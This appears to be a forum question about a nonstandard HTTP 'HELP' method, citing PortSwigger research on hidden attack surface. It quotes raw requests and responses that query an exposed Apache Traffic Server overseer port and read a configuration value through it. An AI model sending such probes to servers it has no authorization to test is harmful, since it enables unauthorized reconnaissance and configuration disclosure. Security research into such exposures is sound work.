I came across a HTTP HELP method (https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface chapter "Invalid Host") and asked myself: Are there any more systems that offer something like that?
I was wondering how did the pentester come up with this method.
Google couldn't help me here.
In the specific case, it was about an Apache Traffic Server, whose help could be queried as follows:
HELP / HTTP / 1.1 Host: XX.X.XXX.XX: 8082 HTTP / 1.1 200 Connection Established Date: Tue, 07 Feb 2017 16:33:59 GMT Transfer encoding: chunked Connection: keep-alive OK Traffic Server Overseer Port commands: get <variable-list> set <variable-name> = "<value>" help exit example: OK get proxy.node.cache.contents.bytes_free proxy.node.cache.contents.bytes_free = "56616048" OK Variable lists are conf / yts / stats records, separated by commas And then applied specifically as follows:
GET / HTTP / 1.1 Host: XX.X.XXX.XX: 8082 Content-Length: 34 GET proxy.config.alarm_email HTTP / 1.1 200 Connection Established Date: Tue, 07 Feb 2017 16:57:02 GMT Transfer encoding: chunked Connection: keep alive ... proxy.config.alarm_email = "[email protected]"